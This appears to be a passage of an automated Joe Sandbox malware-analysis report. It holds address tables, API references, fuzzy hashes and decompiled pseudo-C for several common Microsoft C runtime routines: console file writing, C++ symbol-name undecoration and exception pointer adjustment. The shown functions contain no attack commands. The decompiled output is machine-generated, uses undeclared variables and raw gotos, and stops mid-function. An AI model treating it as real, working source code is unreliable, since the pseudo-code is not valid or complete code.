                                                                                              0x01384c29
                                                                                              0x01384c2f
                                                                                              0x01384c38
                                                                                              0x01384c43
                                                                                              0x01384c48
                                                                                              0x01384c4e
                                                                                              0x01384c57
                                                                                              0x01384c5a
                                                                                              0x00000000
                                                                                              0x01384c5a
                                                                                              0x01384c4e
                                                                                              0x01384b51
                                                                                              0x01384b54
                                                                                              0x01384b5a
                                                                                              0x01384b5c
                                                                                              0x01384b69
                                                                                              0x01384b6a
                                                                                              0x01384b6d
                                                                                              0x01384b70
                                                                                              0x01384b75
                                                                                              0x01384d9b
                                                                                              0x01384d9d
                                                                                              0x01384da0
                                                                                              0x01384da3
                                                                                              0x01384daf
                                                                                              0x01384db2
                                                                                              0x01384db4
                                                                                              0x01384db5
                                                                                              0x01384db9
                                                                                              0x01384dbc
                                                                                              0x01384dc0
                                                                                              0x01384dc0
                                                                                              0x01384dc0
                                                                                              0x01384dc3
                                                                                              0x01384dc3
                                                                                              0x01384b7b
                                                                                              0x01384b7b
                                                                                              0x01384b7e
                                                                                              0x01384b80
                                                                                              0x01384b83
                                                                                              0x01384b85
                                                                                              0x01384b89
                                                                                              0x01384b8a
                                                                                              0x01384b8b
                                                                                              0x01384b8f
                                                                                              0x01384b94
                                                                                              0x01384b9e
                                                                                              0x01384ba3
                                                                                              0x01384ba6
                                                                                              0x01384ba6
                                                                                              0x01384ba9
                                                                                              0x01384bac
                                                                                              0x01384bae
                                                                                              0x01384bb1
                                                                                              0x01384bba
                                                                                              0x01384bbe
                                                                                              0x01384bbf
                                                                                              0x01384bc6
                                                                                              0x01384bcc
                                                                                              0x01384bd4
                                                                                              0x01384bdf
                                                                                              0x01384be4
                                                                                              0x01384bef
                                                                                              0x01384bf4
                                                                                              0x01384bfa
                                                                                              0x01384c03
                                                                                              0x01384c5d
                                                                                              0x01384c5d
                                                                                              0x01384ce8
                                                                                              0x01384ced
                                                                                              0x01384cff
                                                                                              0x01384d04
                                                                                              0x01384d07
                                                                                              0x01384d0c
                                                                                              0x01384d27
                                                                                              0x01384e0a
                                                                                              0x01384e10
                                                                                              0x01384d2d
                                                                                              0x01384d2d
                                                                                              0x01384d38
                                                                                              0x01384d3a
                                                                                              0x01384d3d
                                                                                              0x01384d46
                                                                                              0x01384d50
                                                                                              0x00000000
                                                                                              0x01384d52
                                                                                              0x01384d54
                                                                                              0x01384d56
                                                                                              0x01384d6f
                                                                                              0x00000000
                                                                                              0x01384d75
                                                                                              0x01384d79
                                                                                              0x01384d7f
                                                                                              0x01384d82
                                                                                              0x01384d88
                                                                                              0x01384d8b
                                                                                              0x00000000
                                                                                              0x01384d8b
                                                                                              0x01384d79
                                                                                              0x01384d6f
                                                                                              0x01384d50
                                                                                              0x01384d46
                                                                                              0x01384d27
                                                                                              0x01384d0c
                                                                                              0x01384bfa
                                                                                              0x01384b75
                                                                                              0x01384b4b
                                                                                              0x00000000
                                                                                              0x01384d8e
                                                                                              0x01384d8e
                                                                                              0x01384d97
                                                                                              0x01384e12
                                                                                              0x01384e17
                                                                                              0x01384e1f
                                                                                              0x01384e20
                                                                                              0x01384e21
                                                                                              0x01384e2d
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(1911783B,?,00000000,?), ref: 01384AC4
                                                                                                • Part of subcall function 0136F1C0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,013843B7,?,00000000,-00000008), ref: 0136F26C
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 01384D1F
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01384D67
                                                                                              • GetLastError.KERNEL32 ref: 01384E0A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              • Opcode ID: 03cbda0a1e2d60a73816bb0ceb57b5a784a7cc0ed88a63abec572b9a681b2983
                                                                                              • Instruction ID: 37071df4fa07fb89308abf9569467a8f126fad10020387a2ec8b4246039d71f2
                                                                                              • Opcode Fuzzy Hash: 03cbda0a1e2d60a73816bb0ceb57b5a784a7cc0ed88a63abec572b9a681b2983
                                                                                              • Instruction Fuzzy Hash: 19D17A75D04249AFCF15DFA8D880AADFBB8FF48318F18452AE956EB741E730A941CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135BF5F Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0135BF5F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t76;
				signed int _t77;
				signed int* _t79;
				signed int _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t97;
				void* _t102;
				signed int* _t103;
				signed int _t106;
				signed int* _t108;
				signed int _t115;
				signed int _t120;
				signed int _t121;
				signed int _t124;
				void* _t130;
				signed int _t145;
				signed int _t149;
				void* _t150;

				_t142 = __edi;
				_t140 = __edx;
				_t119 = __ebx;
				_push(0x28);
				E0136F0B6(0x1393651, __ebx, __edi, __esi);
				 *0x13a0b30 =  *0x13a0b30 + 1;
				 *(_t150 - 4) =  *(_t150 - 4) & 0x00000000;
				_t76 =  *0x13a0b20; // 0x0
				if((0x00002000 & _t76) == 0) {
					_t121 =  *0x13a0b18; // 0x0
					_t77 =  *_t121;
					__eflags = _t77 - 0x3f;
					if(_t77 != 0x3f) {
						__eflags = _t77;
						if(_t77 != 0) {
							L33:
							_push(2);
							L42:
							E0135B826( *(_t150 + 8));
							L43:
							_t79 =  *(_t150 + 8);
							L44:
							 *0x13a0b30 =  *0x13a0b30 - 1;
							return E0136F18E(_t79);
						}
						_push(1);
						goto L42;
					}
					_t10 = _t121 + 1; // 0x1
					_t81 = _t10;
					 *0x13a0b18 = _t81;
					__eflags =  *_t81 - 0x3f;
					if( *_t81 != 0x3f) {
						L10:
						E0135C1B3(_t119, _t121, _t142, 0x2000, _t150 - 0x18);
						_t149 =  *(_t150 - 0x18);
						_t120 =  *(_t150 - 0x14);
						__eflags = _t149;
						if(_t149 == 0) {
							L13:
							_t19 = _t150 - 0x10;
							 *_t19 =  *(_t150 - 0x10) & 0x00000000;
							__eflags =  *_t19;
							L14:
							_t145 = _t120 >> 0x0000000f & 1;
							__eflags = _t120 - 1;
							if(_t120 <= 1) {
								_t86 =  *0x13a0b18; // 0x0
								_t87 =  *_t86;
								__eflags = _t87;
								if(_t87 == 0) {
									L24:
									_t124 =  *(_t150 - 0x10);
									__eflags = _t124;
									if(_t124 != 0) {
										__eflags = _t149;
										if(_t149 != 0) {
											_t120 = _t120 | 0x00000200;
											__eflags = _t120;
											 *(_t150 - 0x14) = _t120;
										}
									}
									__eflags = _t145;
									if(_t145 != 0) {
										_t120 = _t120 | 0x00008000;
										__eflags = _t120;
										 *(_t150 - 0x14) = _t120;
									}
									__eflags = _t149;
									if(_t149 == 0) {
										goto L15;
									} else {
										__eflags = 0x00001000 & _t120;
										if((0x00001000 & _t120) != 0) {
											goto L15;
										}
										_t88 =  *0x13a0b18; // 0x0
										_t89 =  *_t88;
										__eflags = _t89;
										if(_t89 == 0) {
											L35:
											__eflags =  *0x13a0b20 & 0x00001000;
											if(( *0x13a0b20 & 0x00001000) == 0) {
												L39:
												E0135E15F(_t124,  *(_t150 + 8), _t150 - 0x18);
												goto L43;
											}
											__eflags = _t124;
											if(_t124 != 0) {
												goto L39;
											}
											__eflags = 0x00008000 & _t120;
											if((0x00008000 & _t120) != 0) {
												goto L39;
											}
											 *(_t150 - 0x30) =  *(_t150 - 0x30) & _t124;
											 *(_t150 - 0x2c) =  *(_t150 - 0x2c) & _t124;
											E0135E15F(_t124, _t150 - 0x28, _t150 - 0x30);
											goto L15;
										}
										__eflags = _t89 - 0x40;
										if(_t89 == 0x40) {
											 *0x13a0b18 =  *0x13a0b18 + 1;
											__eflags =  *0x13a0b18;
											goto L35;
										}
										goto L33;
									}
								}
								__eflags = _t87 - 0x40;
								if(_t87 == 0x40) {
									goto L24;
								}
								E0135CD2F(_t140, _t150 - 0x28);
								_t97 =  *(_t150 - 0x28);
								__eflags = _t97;
								if(_t97 == 0) {
									goto L24;
								}
								__eflags =  *0x13a0b24;
								_t130 = _t150 - 0x20;
								if( *0x13a0b24 == 0) {
									 *(_t150 - 0x20) = _t97;
									 *(_t150 - 0x1c) =  *(_t150 - 0x24);
									 *(_t150 - 0x30) = "::";
									 *(_t150 - 0x2c) = 2;
									E0135BC28(_t130, _t150 - 0x30);
									_push(_t150 - 0x18);
									_t102 = _t150 - 0x28;
									L23:
									_push(_t102);
									_t103 = E0135BB4B(_t150 - 0x20);
									_t120 = _t103[1];
									_t149 =  *_t103;
									 *(_t150 - 0x14) = _t120;
									 *(_t150 - 0x18) = _t149;
									goto L24;
								}
								 *0x13a0b24 = 0;
								 *(_t150 - 0x20) = _t149;
								 *(_t150 - 0x1c) = _t120;
								E0135BD24(_t130, _t150 - 0x28);
								_t106 =  *0x13a0b18; // 0x0
								_t149 =  *(_t150 - 0x20);
								_t120 =  *(_t150 - 0x1c);
								 *(_t150 - 0x18) = _t149;
								__eflags =  *_t106 - 0x40;
								 *(_t150 - 0x14) = _t120;
								if( *_t106 == 0x40) {
									goto L24;
								}
								_t108 = E0135CD2F(_t140, _t150 - 0x30);
								 *(_t150 - 0x28) = "::";
								 *(_t150 - 0x24) = 2;
								 *(_t150 - 0x1c) = _t108[1];
								 *(_t150 - 0x20) =  *_t108;
								E0135BC28(_t150 - 0x20, _t150 - 0x28);
								_push(_t150 - 0x18);
								_t102 = _t150 - 0x30;
								goto L23;
							}
							L15:
							_t79 =  *(_t150 + 8);
							 *_t79 = _t149;
							_t79[1] = _t120;
							goto L44;
						}
						__eflags = _t120 & 0x00000200;
						if((_t120 & 0x00000200) == 0) {
							goto L13;
						}
						 *(_t150 - 0x10) = 1;
						goto L14;
					}
					__eflags =  *((char*)(_t81 + 1)) - 0x3f;
					if(__eflags != 0) {
						goto L10;
					}
					_push(_t150 - 0x28);
					E0135BF5F(__ebx, __edx, __edi, 0x2000, __eflags);
					_t115 =  *0x13a0b18; // 0x0
					while(1) {
						__eflags =  *_t115;
						if( *_t115 == 0) {
							break;
						}
						_t115 = _t115 + 1;
						__eflags = _t115;
						 *0x13a0b18 = _t115;
					}
					L2:
					_t79 =  *(_t150 + 8);
					 *_t79 =  *(_t150 - 0x28);
					_t79[1] =  *(_t150 - 0x24);
					goto L44;
				}
				 *0x13a0b20 = _t76 & 0xffffdfff;
				E0135F46E(_t150 - 0x28, 0);
				 *0x13a0b20 =  *0x13a0b20 | 0x00002000;
				goto L2;
			}
























                                                                                              0x0135bf5f
                                                                                              0x0135bf5f
                                                                                              0x0135bf5f
                                                                                              0x0135bf5f
                                                                                              0x0135bf66
                                                                                              0x0135bf6b
                                                                                              0x0135bf71
                                                                                              0x0135bf7a
                                                                                              0x0135bf81
                                                                                              0x0135bfb3
                                                                                              0x0135bfb9
                                                                                              0x0135bfbb
                                                                                              0x0135bfbd
                                                                                              0x0135c196
                                                                                              0x0135c198
                                                                                              0x0135c152
                                                                                              0x0135c152
                                                                                              0x0135c19c
                                                                                              0x0135c19f
                                                                                              0x0135c1a4
                                                                                              0x0135c1a4
                                                                                              0x0135c1a7
                                                                                              0x0135c1a7
                                                                                              0x0135c1b2
                                                                                              0x0135c1b2
                                                                                              0x0135c19a
                                                                                              0x00000000
                                                                                              0x0135c19a
                                                                                              0x0135bfc3
                                                                                              0x0135bfc3
                                                                                              0x0135bfc6
                                                                                              0x0135bfcb
                                                                                              0x0135bfce
                                                                                              0x0135bff4
                                                                                              0x0135bff8
                                                                                              0x0135bffd
                                                                                              0x0135c002
                                                                                              0x0135c007
                                                                                              0x0135c009
                                                                                              0x0135c018
                                                                                              0x0135c018
                                                                                              0x0135c018
                                                                                              0x0135c018
                                                                                              0x0135c01c
                                                                                              0x0135c021
                                                                                              0x0135c023
                                                                                              0x0135c026
                                                                                              0x0135c035
                                                                                              0x0135c03a
                                                                                              0x0135c03c
                                                                                              0x0135c03e
                                                                                              0x0135c10c
                                                                                              0x0135c10c
                                                                                              0x0135c10f
                                                                                              0x0135c111
                                                                                              0x0135c113
                                                                                              0x0135c115
                                                                                              0x0135c117
                                                                                              0x0135c117
                                                                                              0x0135c11d
                                                                                              0x0135c11d
                                                                                              0x0135c115
                                                                                              0x0135c125
                                                                                              0x0135c127
                                                                                              0x0135c129
                                                                                              0x0135c129
                                                                                              0x0135c12b
                                                                                              0x0135c12b
                                                                                              0x0135c12e
                                                                                              0x0135c130
                                                                                              0x00000000
                                                                                              0x0135c136
                                                                                              0x0135c13b
                                                                                              0x0135c13d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c143
                                                                                              0x0135c148
                                                                                              0x0135c14a
                                                                                              0x0135c14c
                                                                                              0x0135c15c
                                                                                              0x0135c15c
                                                                                              0x0135c162
                                                                                              0x0135c186
                                                                                              0x0135c18d
                                                                                              0x00000000
                                                                                              0x0135c193
                                                                                              0x0135c164
                                                                                              0x0135c166
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c168
                                                                                              0x0135c16a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c16c
                                                                                              0x0135c172
                                                                                              0x0135c17a
                                                                                              0x00000000
                                                                                              0x0135c180
                                                                                              0x0135c14e
                                                                                              0x0135c150
                                                                                              0x0135c156
                                                                                              0x0135c156
                                                                                              0x00000000
                                                                                              0x0135c156
                                                                                              0x00000000
                                                                                              0x0135c150
                                                                                              0x0135c130
                                                                                              0x0135c044
                                                                                              0x0135c046
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c050
                                                                                              0x0135c055
                                                                                              0x0135c059
                                                                                              0x0135c05b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c061
                                                                                              0x0135c068
                                                                                              0x0135c06b
                                                                                              0x0135c0d1
                                                                                              0x0135c0d7
                                                                                              0x0135c0de
                                                                                              0x0135c0e5
                                                                                              0x0135c0ec
                                                                                              0x0135c0f4
                                                                                              0x0135c0f5
                                                                                              0x0135c0f8
                                                                                              0x0135c0f8
                                                                                              0x0135c0fc
                                                                                              0x0135c101
                                                                                              0x0135c104
                                                                                              0x0135c106
                                                                                              0x0135c109
                                                                                              0x00000000
                                                                                              0x0135c109
                                                                                              0x0135c070
                                                                                              0x0135c078
                                                                                              0x0135c07b
                                                                                              0x0135c07e
                                                                                              0x0135c083
                                                                                              0x0135c088
                                                                                              0x0135c08b
                                                                                              0x0135c08e
                                                                                              0x0135c091
                                                                                              0x0135c094
                                                                                              0x0135c097
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c09d
                                                                                              0x0135c0a3
                                                                                              0x0135c0aa
                                                                                              0x0135c0b6
                                                                                              0x0135c0bc
                                                                                              0x0135c0c3
                                                                                              0x0135c0cb
                                                                                              0x0135c0cc
                                                                                              0x00000000
                                                                                              0x0135c0cc
                                                                                              0x0135c028
                                                                                              0x0135c028
                                                                                              0x0135c02b
                                                                                              0x0135c02d
                                                                                              0x00000000
                                                                                              0x0135c02d
                                                                                              0x0135c00b
                                                                                              0x0135c011
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135c013
                                                                                              0x00000000
                                                                                              0x0135c013
                                                                                              0x0135bfd0
                                                                                              0x0135bfd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135bfd9
                                                                                              0x0135bfda
                                                                                              0x0135bfdf
                                                                                              0x0135bfed
                                                                                              0x0135bfed
                                                                                              0x0135bff0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135bfe7
                                                                                              0x0135bfe7
                                                                                              0x0135bfe8
                                                                                              0x0135bfe8
                                                                                              0x0135bfa0
                                                                                              0x0135bfa0
                                                                                              0x0135bfa6
                                                                                              0x0135bfab
                                                                                              0x00000000
                                                                                              0x0135bfab
                                                                                              0x0135bf88
                                                                                              0x0135bf93
                                                                                              0x0135bf98
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 0135BF66
                                                                                              • UnDecorator::getSymbolName.LIBCMT ref: 0135BFF8
                                                                                              • DName::operator+.LIBCMT ref: 0135C0FC
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135C19F
                                                                                                • Part of subcall function 0135BC28: shared_ptr.LIBCMT ref: 0135BC44
                                                                                                • Part of subcall function 0135E15F: DName::DName.LIBVCRUNTIME ref: 0135E1BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 1134295639-0
                                                                                              • Opcode ID: d79cf64a146675a93141d559ac56df5f0457c9cf3acb97e1a0e7bb7b7fb98cd2
                                                                                              • Instruction ID: e6f5e466d919d4e6a760daf4cdf2dcb7b9446e4ffaa40fae79acf7f93bc640dc
                                                                                              • Opcode Fuzzy Hash: d79cf64a146675a93141d559ac56df5f0457c9cf3acb97e1a0e7bb7b7fb98cd2
                                                                                              • Instruction Fuzzy Hash: F7715776D003098FEB95CFA8D580EEDBBB9BB09B1CF44101AED01AB245D7319A44CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01385B18 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E01385B18(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x139dc58);
				E01353A50(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E013547B0(_t107, E013542C9(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E013547B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x13a014c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x13a2000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0135B0BB(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x139dc78);
									E01353A50(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E01385B18(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E01385554(_t103, _t108[0x18], E013542C9( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E01385564(_t103, _t108[0x18], E013542C9( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E013542C9();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                              0x01385b18
                                                                                              0x01385b1a
                                                                                              0x01385b1f
                                                                                              0x01385b24
                                                                                              0x01385b26
                                                                                              0x01385b29
                                                                                              0x01385b2e
                                                                                              0x01385c3e
                                                                                              0x01385c3e
                                                                                              0x01385c3e
                                                                                              0x00000000
                                                                                              0x01385b3d
                                                                                              0x01385b3d
                                                                                              0x01385b42
                                                                                              0x01385b4c
                                                                                              0x01385b4e
                                                                                              0x01385b53
                                                                                              0x01385b58
                                                                                              0x01385b58
                                                                                              0x01385b5a
                                                                                              0x01385b5d
                                                                                              0x01385b62
                                                                                              0x01385b84
                                                                                              0x01385b84
                                                                                              0x01385b87
                                                                                              0x01385b8a
                                                                                              0x01385ba8
                                                                                              0x01385bab
                                                                                              0x01385bea
                                                                                              0x01385bed
                                                                                              0x01385bf0
                                                                                              0x01385c15
                                                                                              0x01385c17
                                                                                              0x00000000
                                                                                              0x01385c19
                                                                                              0x01385c19
                                                                                              0x01385c1b
                                                                                              0x00000000
                                                                                              0x01385c1d
                                                                                              0x01385c1d
                                                                                              0x01385c22
                                                                                              0x01385c26
                                                                                              0x01385c26
                                                                                              0x01385c27
                                                                                              0x00000000
                                                                                              0x01385c27
                                                                                              0x01385c1b
                                                                                              0x01385bf2
                                                                                              0x01385bf2
                                                                                              0x01385bf4
                                                                                              0x00000000
                                                                                              0x01385bf6
                                                                                              0x01385bf6
                                                                                              0x01385bf8
                                                                                              0x00000000
                                                                                              0x01385bfa
                                                                                              0x01385c0b
                                                                                              0x00000000
                                                                                              0x01385c10
                                                                                              0x01385bf8
                                                                                              0x01385bf4
                                                                                              0x01385bad
                                                                                              0x01385bad
                                                                                              0x01385bb1
                                                                                              0x00000000
                                                                                              0x01385bb7
                                                                                              0x01385bb7
                                                                                              0x01385bb9
                                                                                              0x00000000
                                                                                              0x01385bbf
                                                                                              0x01385bc6
                                                                                              0x01385bce
                                                                                              0x01385bd2
                                                                                              0x01385bd4
                                                                                              0x01385bd7
                                                                                              0x01385bdc
                                                                                              0x01385bdd
                                                                                              0x00000000
                                                                                              0x01385bdd
                                                                                              0x01385bd7
                                                                                              0x00000000
                                                                                              0x01385bd2
                                                                                              0x01385bb9
                                                                                              0x01385bb1
                                                                                              0x01385b8c
                                                                                              0x01385b8c
                                                                                              0x00000000
                                                                                              0x01385b8c
                                                                                              0x01385b69
                                                                                              0x01385b69
                                                                                              0x01385b6e
                                                                                              0x01385b73
                                                                                              0x00000000
                                                                                              0x01385b75
                                                                                              0x01385b77
                                                                                              0x01385b80
                                                                                              0x01385b8f
                                                                                              0x01385b91
                                                                                              0x01385c50
                                                                                              0x01385c50
                                                                                              0x01385c55
                                                                                              0x01385c56
                                                                                              0x01385c58
                                                                                              0x01385c5d
                                                                                              0x01385c62
                                                                                              0x01385c65
                                                                                              0x01385c68
                                                                                              0x01385c6b
                                                                                              0x01385c74
                                                                                              0x01385c74
                                                                                              0x01385c6d
                                                                                              0x01385c6d
                                                                                              0x01385c6d
                                                                                              0x01385c77
                                                                                              0x01385c7b
                                                                                              0x01385c7e
                                                                                              0x01385c7f
                                                                                              0x01385c80
                                                                                              0x01385c81
                                                                                              0x01385c84
                                                                                              0x01385c8d
                                                                                              0x01385c8d
                                                                                              0x01385c90
                                                                                              0x01385cc6
                                                                                              0x01385c92
                                                                                              0x01385c92
                                                                                              0x01385c92
                                                                                              0x01385c95
                                                                                              0x01385cac
                                                                                              0x01385cac
                                                                                              0x01385c95
                                                                                              0x01385ccb
                                                                                              0x01385cd5
                                                                                              0x01385ce1
                                                                                              0x01385b9f
                                                                                              0x01385b9f
                                                                                              0x01385ba4
                                                                                              0x01385ba5
                                                                                              0x01385bdf
                                                                                              0x01385be6
                                                                                              0x01385c2a
                                                                                              0x01385c2a
                                                                                              0x01385c31
                                                                                              0x01385c40
                                                                                              0x01385c43
                                                                                              0x01385c4f
                                                                                              0x01385c4f
                                                                                              0x01385b91
                                                                                              0x01385b73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385b42

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: abc7f3cb4d523e926a4389e2b20cef5c1a79d300ab40623b92caef3660a0e82b
                                                                                              • Instruction ID: 74d6629956d56dace86b6f90d5d1d73cb4ca5f7811d921f847e39c84d5c3a49b
                                                                                              • Opcode Fuzzy Hash: abc7f3cb4d523e926a4389e2b20cef5c1a79d300ab40623b92caef3660a0e82b
                                                                                              • Instruction Fuzzy Hash: 5E51A271601306EFEF29AF58D840B6A7BB5FF54718F144629EE0597691E731E880CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136D572 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0136D572(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
